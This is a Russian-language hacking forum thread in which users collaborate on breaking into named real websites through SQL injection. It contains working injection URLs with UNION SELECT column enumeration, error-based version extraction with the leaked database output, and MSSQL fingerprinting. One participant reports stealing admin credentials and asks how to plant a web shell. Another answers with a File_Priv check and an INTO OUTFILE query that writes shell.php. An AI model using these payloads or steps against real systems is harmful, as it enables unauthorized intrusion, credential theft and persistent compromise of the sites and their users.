05.10.2010, 21:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.ncm.org.uk/news.asp?id=1+and+1=(select+top+1+table_name+from+ information_schema.tables)
дальше сам
|
|
|
05.10.2010, 21:19
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от pinch
хэлп помогтие раскрутить
http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail
Если не знаешь как дальше, то пиши в ПМ
|
|
|
|
05.10.2010, 21:20
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от -PRIVAT-
http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20c oncat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201&act=detail
Если не знаешь как дальше, то пиши в ПМ
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--&act=detail
mm?
|
|
|
|
05.10.2010, 21:21
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от Konqi
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--&act=detail
mm?
мм... можно и так
|
|
|
|
05.10.2010, 21:22
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
чуваки в том то и дело что FROM никак не вставишь=((
хотел станд. методом
так уж быть
http://www.lpem.org/index.php?mn=6&sb=9&id=9+and+%28select+1+from+%28s elect+count%280%29,concat%28%28select+version%28%2 9%29,floor%28rand%280%29*2%29%29+from+information_ schema.tables+group+by+2%29a%29--&act=detail
Duplicate entry '5.1.50-log1' for key 'group_key'
|
|
|
|
05.10.2010, 21:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
|
|
|
|
05.10.2010, 21:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pinch
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
тут точно не мускул, думаю ms_sql, но не скажу почему )
21 столбцов но селект не робит.
если есть желание копай дальше
|
|
|
|
05.10.2010, 21:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
ну да, mssql
http://www.yakutproekt.ru/news.php?id=14517+and+len(@@version)=len(@@version )
4-ый сайт вообще не открывается без ошибки..
|
|
|
|
06.10.2010, 03:04
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
|
|
|
|
06.10.2010, 03:57
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от GroM88
мб как то можно залить шел с помощью sql запроса?
для этого ты должен иметь права на запись и знать локальный путь до сайта.
чтобы узнать есть ли права, используй запрос
UNION SELECT File_Priv from mysql.user
если в ответ получишь Y, то права есть.
чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь.
если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла:
UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
